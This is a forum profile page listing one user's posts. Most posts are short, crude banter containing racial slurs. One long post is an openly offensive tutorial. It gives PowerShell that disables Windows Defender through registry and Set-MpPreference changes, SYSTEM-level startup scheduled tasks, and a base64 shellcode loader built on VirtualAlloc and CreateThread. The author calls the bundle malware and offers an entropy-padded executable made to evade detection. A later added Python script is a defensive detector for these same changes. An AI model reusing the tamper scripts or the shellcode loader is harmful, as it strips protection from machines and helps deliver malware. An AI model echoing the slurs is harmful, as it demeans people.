
Posts by Sophie

  1. Sophie Pedophile Tech Support
    Originally posted by Wariat i remember what he told me now. he said that teen girls have no power or money or rely on their parents just to live so you got to think youre the catch or desirable and not them - and have power and they should want you not you them or chase them or some shit like that. star trek wat u fink?

    Not the whole picture but there is a grain of truth in there. No woman of any age likes a desperate guy, or someone that comes across as such.
  2. Sophie Pedophile Tech Support
    Originally posted by troon lol, who's fucking with shit, i neva wrote that?

    ETA: yes i did, a year ago. vinny is right, i have an iq of 65. fuck you vinny, who gives a shit I get more sex than you.

    Somehow, someway this post reminded me of this one hacker girl, maybe you know her. She runs a site called something like vulnerablebrokenthings.com she's actually pretty talented.
  3. Sophie Pedophile Tech Support
    Originally posted by Bradley This isn't a real charity

    He's right though, performative charity is just self-aggrandizement in disguise.
  4. Sophie Pedophile Tech Support
    Originally posted by vindicktive vinny can a englishman be wrong at english ?

    Yep. Because the language exists outside of the person speaking it. And necessarily it must. Because if it didn't it'd be no good for communicating.

    Think about it like this, when a kid is born to English parents are the sounds the kid is making English sounds? The kid is English after all. So by your logic, yes. But that is not commensurate with reality.
  5. Sophie Pedophile Tech Support
    Originally posted by Bradley Why? They need drugs not groceries

    If they don't need groceries they don't need food stamps.
  6. Sophie Pedophile Tech Support
    Originally posted by Bradley I am looking for the thread where we can post and before the posts are then taken and put in that thread Michael Myers

    Dead nigga memorial link at the bottom.

    https://niggasin.space/page/about
  7. Sophie Pedophile Tech Support
    Originally posted by Bradley Ask the people is the worst advice you could've given me, even worse than two days ago when i called Sudo from the store for dinner advice and he couldn't understand that TARGET doesn't have gator and crawdads

    It's tradition. We don't get to decide what it says. And with we i mean those of us who have a personal custom one.
  8. Sophie Pedophile Tech Support
    That's right it's another issue of Sophie's Cyber Shenanigans[Anti Telemetry(Again!) and More!] Edition. With even more scripts, more flavor text, and the best part is i did all the boring stuff for you so you don't have to.


    Ever want to write malware, exploits, a crypter or what have you and not have Micrococks have a copy of your source and final product before you even have your C2 online? Yeah? Well first of all use Windows Server 2016 Enterprise Edition and configure it properly when installing. Or get the Windows Deployment Kit for a custom Win10 install. But protip just running Win2016 Enterprise is easiest and works best IMO.

    However ain't nobody got time for that and you already have your Win10 box and you want to use that one, i feel you.

    If you're a skid and just want to download some hacking tools and start blasting but can't because WinDefend keeps quarantining everything as either potential malware, hacking tool, and/or PUP.
    Or if you are a casual user, you might like Micrococks not to have all your data by ways of telemetry. I posted a thread with scripts and source to kill telemetry and for a Windows Service in C++ to automate the whole lot here in T&T as well, but no need to open another tab, i gotchu fam.

    Both with a lot of telemetry and automated housekeeping that Windows does, Windows Defender is responsible for the most egregious shit. Hence the title of the thread. I wrote this script to rectify some of that.

    ##-!NOTICE!-##
    # You may want to give this a look over if you simply want to maim
    # not kill Windows Defender

    Write-Host "[+]If you don't know what you're doing, stop executing this script." -f 'gre'
    Read-Host "If you do know, press any key to continue..." -f 'gre'

    try {
    New-Item -Path 'HKLM:\SOFTWARE\Policies\Microsoft'-Name "Windows Defender" -Force -ea 0 | Out-Null
    # Pretty self explanatory
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
    # This is the kind of shit Windows gets up to when it thinks you're idling
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableRoutinelyTakingAction" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
    # Spynet? No, doesn't seem suspicious to me guvner, honest
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SpyNetReporting" -Value 0 -PropertyType DWORD -Force -ea 0 | Out-Null
    # Windows assumes consent, don't touch my freaking samples bro. Not cool
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SubmitSampleConsent" -Value 0 -PropertyType DWORD -Force -ea 0 | Out-Null
    # No one needs to know...
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MRT" -Name "DontReportInfectionInformation" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
    # These features can die in a fire, look it over in case you'd like to comment
    # out some lines if you wanna play it safe, i like living on the edge
    if (-Not ((GetWmiObject -class Win32 OperatingSystem).Version -eq "6.1.7601")) {
    Add-MpPreference -ExclusionPath "C:\" -Force -ea 0 | Out-Null
    Set-MpPreference -DisableArchiveScanning $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableBehaviorMonitoring $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableBlockAtFirstSeen $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableCatchupFullScan $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableCatchupQuickScan $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableIntrusionPreventionSystem $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableIOAVProtection $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableRealTimeMonitoring $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableRemovableDriveScanning $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableRestorePoint $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableScanningNetworkFiles $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableScriptScanning $true -Force -ea 0 | Out-Null
    Set-MpPreference -EnableControlledFolderAcces Disabled -Force -ea 0 | Out-Null
    Set-MpPreference -EnablenetworkProtection AuditMode -Force -ea 0 | Out-Null
    Set-MpPreference -MAPSReporting Disabled -Force -ea 0 | Out-Null
    Set-MpPreference -SubmitSampleConsent NeverSend -Force -ea 0 | Out-Null
    Set-MpPreference -PUAProtection Disabled -Force -ea 0 | Out-Null
    }
    } catch {
    Write-Warning "Failed to disable Windows Defender component"
    }

    # If this errors out you either don't have the right permissions or the service has already been stopped
    try {
    Get-Service WinDefend | Stop-Service -Force
    Set-itemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\services\Windefend" -name "Start" -Value 4 -Type DWORD -Force

    } catch {
    Write-Warning "Failed to disable WinDefend Service"

    }


    Make a text file and paste the code block. Save it as something like windef.ps1.

    I would recommend running this as at least a Domain Admin, or straight up NT AUTHORITY\System if you can. A simple way to do that(Kinda) is to create a scheduled task and set it to run at startup as the SYSTEM user. The commands for doing so would look a lot like this


    schtasks /create /tn 'windef' /tr powershell %WINDIR%\windev.ps1 /sc onstart /ru System


    Change the details as necessary.

    If you want to take this a step further save the following as a .bat file and run it as administrator. This script was a part of the original ensemble i had in a previous anti-telemetry thread


    @ECHO OFF
    SETLOCAL

    echo Uninstalling updates relevant to telemetry ops
    echo Delete KB2902907 (Microsoft Security Essentials)
    start "title" /b /wait wusa.exe /kb:2902907 /uninstall /quiet /norestart

    echo Delete KB3022345 (telemetry)
    start "title" /b /wait wusa.exe /kb:3022345 /uninstall /quiet /norestart

    echo Delete KB3068708 (telemetry)
    start "title" /b /wait wusa.exe /kb:3068708 /uninstall /quiet /norestart

    echo Delete KB3080149 (Telemetry)
    start "title" /b /wait wusa.exe /kb:3080149 /uninstall /quiet /norestart


    In order to be thorough and have a good use for another older script of mine we'll be blocking domains Micro$oft runs in order to receive things like telemetry and samples.

    Ideally you would blacklist these in your router. Alternatively we can basically null-route them for all intents and purposes at the OS Networking level. What we will need is a BlackHole server, a Proxy Auto Config script, and a web server to serve the proxy config locally.

    Here's my implementation of a HTTP server in powershell.

    # PowerShell RegEdit and HTTP Server
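    # The registry provider path needs the drive colon (HKLM:\), otherwise Test-Path treats it as a file path
    $registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\"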

    $Name = "EnableLegacyAutoProxyFeatures"

    $value = "1"

    # Check to see if an entry exists and set value
    # If it doesn't create the appropriate subkey
    if(!(Test-Path $registryPath)) {
    New-Item -Path $registryPath -Force | Out-Null
    New-ItemProperty -Path $registryPath -Name $name -Value $value `
    -PropertyType DWORD -Force | Out-Null
    }

    else {
    New-ItemProperty -Path $registryPath -Name $name -Value $value `
    -PropertyType DWORD -Force | Out-Null
    }

    # Http Server
    $http = [System.Net.HttpListener]::new()

    # Listen at 8080
    $http.Prefixes.Add("http://localhost:8080/")

    # Start the Http Server
    $http.Start()


    # Confirm
    if ($http.IsListening) {
    write-host " HTTP Server Listening " -f 'gre'
    write-host " Please direct Windows Auto Proxy Config to http://localhost:8080/ " -f 'gre'
    }


    # Server Loop
    while ($http.IsListening) {

    $context = $http.GetContext()

    if ($context.Request.HttpMethod -eq 'GET' -and $context.Request.RawUrl -eq '/') {

    # Log to terminal
    write-host "$($context.Request.UserHostAddress) => $($context.Request.Url)" -f 'gre'

    # Get proxy.pac data
    # Don't forget to change this to reflect the situation at your end
    [string]$data = Get-Content "C:\some\path\proxy.pac" -Raw

    # Field the request
    $buffer = [System.Text.Encoding]::UTF8.GetBytes($data)
    $context.Response.ContentLength64 = $buffer.Length
    $context.Response.OutputStream.Write($buffer, 0, $buffer.Length) # Data stream
    $context.Response.OutputStream.Close() # Close

    }
    } # End of server loop


    Proxy Auto Config Scripts have to be in JavaScript. I have made some adjustments to this one with regards to the one i had in my other thread. Basically we're not going to bother routing normal traffic through tor this time.

    <script type="application/x-ns-proxy-autoconfig">

    // Declare vars
    var normal = "DIRECT";
    var blackhole = "PROXY 127.0.0.1:55555";

    function FindProxyForURL(url, host) {

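    // Plain host names, .local names and private ranges go direct.
    // (A bare dnsResolve(host) here is truthy for every resolvable host and would send everything direct.)
    if (isPlainHostName(host) || shExpMatch(host, '*.local')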
    || isInNet(dnsResolve(host), '10.0.0.0', '255.0.0.0')
    || isInNet(dnsResolve(host), '172.16.0.0', '255.240.0.0')
    || isInNet(dnsResolve(host), '192.168.0.0', '255.255.0.0')
    || isInNet(dnsResolve(host), '127.0.0.0', '255.255.255.0')) {
    return normal;
    }

    if (shExpMatch(url, "*oca.telemetry.microsoft.com*")
    || shExpMatch(url, "*telecommand.telemetry.microsoft.com*")
    || shExpMatch(url, "*oca.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*a-0001.a-msedge.net*")
    || shExpMatch(url, "*a-0002.a-msedge.net*")
    || shExpMatch(url, "*a-0003.a-msedge.net*")
    || shExpMatch(url, "*a-0004.a-msedge.net*")
    || shExpMatch(url, "*a-0004.a-msedge.net*")
    || shExpMatch(url, "*a-0005.a-msedge.net*")
    || shExpMatch(url, "*a-0006.a-msedge.net*")
    || shExpMatch(url, "*a-0006.a-msedge.net*")
    || shExpMatch(url, "*a-0007.a-msedge.net*")
    || shExpMatch(url, "*a-0008.a-msedge.net*")
    || shExpMatch(url, "*a-0009.a-msedge.net*")
    || shExpMatch(url, "*i1.services.social.microsoft.com")
    || shExpMatch(url, "*telecommand.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*sqm.df.telemetry.microsoft.com*")
    || shExpMatch(url, "telemetry.appex.bing.net*")
    || shExpMatch(url, "*settings-sandbox.data.microsoft.com*")
    || shExpMatch(url, "*pre.footprintpredict.com")
    || shExpMatch(url, "*aidps.atdmt.com*")
    || shExpMatch(url, "*aka-cdn-ns.adtech.de*")
    || shExpMatch(url, "*a-msedge.net*")
    || shExpMatch(url, "*b.rad.msn.com*")
    || shExpMatch(url, "*az361816.vo.msecnd.net*")
    || shExpMatch(url, "*b.ads1.msn.com*")
    || shExpMatch(url, "*b.ads2.msads.net*")
    || shExpMatch(url, "*watson.telemetry.microsoft.com*")
    || shExpMatch(url, "*wes.df.telemetry.microsoft.com*")
    || shExpMatch(url, "*bs.serving-sys.com*")
    || shExpMatch(url, "*redir.metaservices.microsoft.com*")
    || shExpMatch(url, "*reports.wes.df.telemetry.microsoft.com*")
    || shExpMatch(url, "*cs1.wpc.v0cdn.net*")
    || shExpMatch(url, "*corpext.msitadfs.glbdns2.microsoft.comt*")
    || shExpMatch(url, "*df.telemetry.microsoft.com*")
    || shExpMatch(url, "*services.wes.df.telemetry.microsoft.com*")
    || shExpMatch(url, "*watson.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*sqm.telemetry.microsoft.com*")
    || shExpMatch(url, "*sqm.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*watson.ppe.telemetry.microsoft.com*")
    || shExpMatch(url, "*telemetry.microsoft.com*")
    || shExpMatch(url, "*telemetry.urs.microsoft.com*")
    || shExpMatch(url, "*survey.watson.microsoft.com*")
    || shExpMatch(url, "*watson.live.com*")
    || shExpMatch(url, "*vortex-sandbox.data.microsoft.com*")
    || shExpMatch(url, "*settings-win.data.microsoft.com*")
    || shExpMatch(url, "*watson.microsoft.com*")
    || shExpMatch(url, "*db3aqu.atdmt.com*")
    || shExpMatch(url, "*diagnostics.support.microsoft.com*")
    || shExpMatch(url, "*statsfe2.update.microsoft.com.akadns.net*")
    || shExpMatch(url, "*fe2.update.microsoft.com.akadns.net*")
    || shExpMatch(url, "*schemas.microsoft.akadns.net*")
    || shExpMatch(url, "*feedback.microsoft-hohm.com*")
    || shExpMatch(url, "*feedback.search.microsoft.com*")
    || shExpMatch(url, "*statsfe1.ws.microsoft.com*")
    || shExpMatch(url, "*statsfe1.ws.microsoft.com*")
    || shExpMatch(url, "*c.atdmt.com*")) {
    // This list may be incomplete and/or slightly outdated
    // TODO: Fix that
    return blackhole;

    } else {
    return normal;
    }
    }
    </script>


    For a perfectly adequate blackhole server, pip has you covered. If you have the Python interpreter and pip installed you can use the following commands to grab the server in question.
    pip install tcp_blackhole


    Easy. When you're invoking the script either through 'python -m tcp_blackhole.py' or by calling it from a different script/utility make sure the argument for http mode is set to True. And set the port argument to 55555. So that it's commensurate with the PAC Script

    To persist this state of affairs once everything is in place, another scheduled task may be in order.
    schtasks /create /tn 'StageProxyOps' /tr powershell %WINDIR%\HTTP-Proxy-Server.ps1 /sc onstart /ru System


    Which reminds me, if you want to try something a little more pro-active with regards to the script that kills WinDefender i generated the following

    Set-StrictMode -Version 2
    $dQA = @"
    using System;
    using System.Runtime.InteropServices;
    namespace c5qI1 {
    public class func {
    [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
    [Flags] public enum MemoryProtection { ReadWrite = 0x04, Execute= 0x10 }
    [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
    [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, int flNewProtect,out int lpflOldProtect);
    [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
    }
    }
    "@

    $g_ = New-Object Microsoft.CSharp.CSharpCodeProvider
    $kp_ = New-Object System.CodeDom.Compiler.CompilerParameters
    $kp_.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
    $kp_.GenerateInMemory = $True
    $qwx = $g_.CompileAssemblyFromSource($kp_, $dQA)

    [Byte[]]$gycNB = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1XBvd2Vyc2hlbGwgLU5vUCAtZXhlYyBieXBhc3MgLlwlV0lORElSJVx3aW5leGVjMi5wczEA")
    [Uint32]$h9koM = 0

    $vnJp = [c5qI1.func]::VirtualAlloc(0, $gycNB.Length + 1, [c5qI1.func+AllocationType]::Reserve -bOr [c5qI1.func+AllocationType]::Commit, [c5qI1.func+MemoryProtection]::ReadWrite)
    if ([Bool]!$vnJp) { $global:result = 3; return }
    [System.Runtime.InteropServices.Marshal]::Copy($gycNB, 0, $vnJp, $gycNB.Length)

    if ([c5qI1.func]::VirtualProtect($vnJp,[Uint32]$gycNB.Length + 1, [c5qI1.func+MemoryProtection]::Execute, [Ref]$h9koM) -eq $true ) {
    [IntPtr] $yU_ = [c5qI1.func]::CreateThread(0,0,$vnJp,0,0,0)
    if ([Bool]!$yU_) { $global:result = 7; return }
    $nQ_ = [c5qI1.func]::WaitForSingleObject($yU_, [c5qI1.func+Time]::Infinite)
    }


    As you can see this powershell script has inline C#, that's to build a special DLL that will mimic kernel32 DLL, but for our ends. Kernel32.dll in short is involved with memory management, I/O, and its process lives in kernelland. Which is good. A bit further down you can see a Base64 encoded string, this is actually encoded shellcode and we're going to use functions imported from kernel32.dll to inject that shellcode(once decoded) into memory using the CreateRemoteThread Method. Once injected it's going to fire off the equivalent of this command: powershell -NoP -exec bypass -c .\%WINDIR%\windef.ps1.

    As you can tell it's going to assume the WinDefKiller script lives in the %WINDIR% and is called windef.ps1. The point being that when done like this you won't be running the script from your user context but it will run in the context of the process doing the invoking.

    Anyway i was bored so i made some stuff to drop the WinDefKiller script in its expected spot, automatically launch it through the script you see above and on top of that also add a scheduled task. Then i put it all together into one big beautiful executable and padded the executable out to the point of low entropy in order to fly under the radar while Windows Defender still lives. It's basically malware, so if you are feeling adventurous shoot me a message and i may send you a precompiled executable. For fully automated Windows Defender murdering madness.

    Here's what it looks like on the inside:



    Anyway i hope you found all that at least somewhat informative, but mostly useful. I genuinely despise the way Micro$oft goes about these things. Unfortunately I'm gonna have to make a new edition of this thread for Windows 11 pretty soon, i think.
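
Seen from the detection side, the settings the scripts in this post change are distinctive enough to triage on. The following is an added example, not part of the original thread: it matches command-line or PowerShell script block text against rules built from the registry values, `Set-MpPreference` switches, service change, scheduled task and in-memory loader calls shown above. The event shape (`host`, `text`), the rule names and every sample record are constructed assumptions.

```python
import re
from collections import defaultdict

# (rule id, regex) pairs, matched against lower-cased, whitespace-collapsed text.
# The setting names come from the scripts in the post above.
RULES = [(name, re.compile(rx, re.S)) for name, rx in [
    ("defender_policy_reg",
     r"policies\\microsoft\\(windows defender|mrt)\b.*\b(disableantispyware|"
     r"disableroutinelytakingaction|spynetreporting|submitsampleconsent|"
     r"dontreportinfectioninformation)\b"),
    ("mppreference_disable", r"\bset-mppreference\b.*-disable\w+\s+(\$true|1)\b"),
    ("mppreference_weaken",
     r"\bset-mppreference\b.*-(mapsreporting|puaprotection)\s+(disabled|0)\b"),
    # Only a bare drive root counts; a narrower folder exclusion does not.
    ("drive_root_exclusion",
     r'\badd-mppreference\b.*-exclusionpath\s+["\']?[a-z]:\\?["\']?(\s|$)'),
    ("windefend_service_off", r"services\\windefend\b.*\bstart\b.*-value\s+4\b"),
    ("system_startup_task",
     r'\bschtasks(\.exe)?\b.*/create\b(?=.*/sc\s+onstart)'
     r'(?=.*/ru\s+["\']?system)(?=.*powershell)'),
    ("inmemory_loader",
     r"(?=.*virtualalloc)(?=.*createthread)(?=.*frombase64string)"),
]]

def normalise(text):
    """Strip backtick/caret escaping, collapse whitespace, lower-case."""
    text = text.replace("`", "").replace("^", "")
    return re.sub(r"\s+", " ", text).lower()

def triage(events):
    """Map host -> sorted list of distinct rule ids that fired."""
    hits = defaultdict(set)
    for ev in events:
        text = normalise(ev["text"])
        for name, rx in RULES:
            if rx.search(text):
                hits[ev["host"]].add(name)
    return {host: sorted(rules) for host, rules in hits.items()}

def flagged_hosts(events, min_rules=2):
    """Hosts where several independent tamper signals co-occur."""
    return sorted(h for h, r in triage(events).items() if len(r) >= min_rules)

# Constructed sample records (not real telemetry). "text" stands in for a
# process command line or a script block log entry; paths are placeholders.
SAMPLE_EVENTS = [
    {"host": "WS01", "text": r'New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -PropertyType DWORD -Force'},
    {"host": "WS01", "text": r'Set-MpPreference -DisableRealTimeMonitoring $true -Force'},
    {"host": "WS01", "text": r'Add-MpPreference -ExclusionPath "C:\" -Force'},
    {"host": "WS01", "text": r'Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\services\Windefend" -Name "Start" -Value 4 -Type DWORD -Force'},
    {"host": "WS01", "text": r"schtasks /create /tn 'example' /tr powershell %WINDIR%\example.ps1 /sc onstart /ru System"},
    {"host": "WS02", "text": r'Set-MpPreference -DisableRealtimeMonitoring $false'},
    {"host": "WS02", "text": r'Add-MpPreference -ExclusionPath "C:\Builds\cache"'},
    {"host": "WS02", "text": r'schtasks /query /fo LIST'},
    {"host": "WS03", "text": r'Set-MpPreference -PUAProtection Disabled'},
    {"host": "WS04", "text": r'$b = [Convert]::FromBase64String($blob); [W]::VirtualAlloc(0, $b.Length, 0x3000, 0x04); [W]::CreateThread(0, 0, $p, 0, 0, 0)'},
    {"host": "WS04", "text": r'Set-Mp`Preference -DisableScriptScanning 1'},
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, rules)
    print("flagged:", flagged_hosts(SAMPLE_EVENTS))
```

A single weakened preference (WS03) is left for review rather than flagged, since administrators do change individual settings; the threshold is a tuning choice.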
  9. Sophie Pedophile Tech Support
    Originally posted by Michael Myers Two microdoses of 1P-LSD, 20g each. And something that's called Galaxy Rise? No idea what it is, but it was offered for free so I accepted it.

    Galaxy Rise sounds like a name the street or a vendor gave to some substance.
  10. Sophie Pedophile Tech Support
    Being homeless is a choice.
  11. Sophie Pedophile Tech Support
    It should be a felony tbh.
  12. Sophie Pedophile Tech Support
    Originally posted by cigreting I thought this fred was going to be about how warioat is into licking guys assholes now

    Me too to be honest.
  13. Sophie Pedophile Tech Support
    If so, i hate to say it but nothing of value was lost.
  14. Sophie Pedophile Tech Support
    So just London then?
  15. Sophie Pedophile Tech Support
    Two glizzies and a Snack Pack? That would be easy to top. What are we going for though, best fast food? Best home-cooked? Besides my skills and talents, which are considerable. I can also cook a killer homemade meal.
  16. Sophie Pedophile Tech Support
    Originally posted by Jiggaboo_Johnson Yes, not that I live there anymore but my dad is always going on about the cops.

    Apparently they are so short staffed at the moment that if you report a non violent crime it probably wont be investigated…he was saying something about if your home is burgled they will only come out on certain days according to your house number

    So even numbers get a visit mon tue wed…odd number houses tue thurs sat etc.

    Fucking lol

    You should communicate this to a merry band of burglars and pick pockets.
  17. Sophie Pedophile Tech Support
    Do the police not have a non-emergency number in the UK? We have the emergency number and a regular ass number that'll put you through to the cops on phone duty at the precinct's operations center.
  18. Sophie Pedophile Tech Support
    Originally posted by Kafka Mik taught me how to maim people. You should be scared of your own ignorance if you think the worst that can happen is being hit.

    When Bradley was having street fights were you studying the blade?
  19. Sophie Pedophile Tech Support
    Originally posted by Steven I believe you.

    Obviously. When someone says "true story" it has to be a true story, them's the rules.
  20. Sophie Pedophile Tech Support
    Originally posted by Sudo You really know how to groom your way into my heart ❤️ let's take a hot air balloon ride and see where it goes

    I know where this is going, someway somehow i'll have a tragic hot air ballooning accident. And we'll be a nigga down ;-;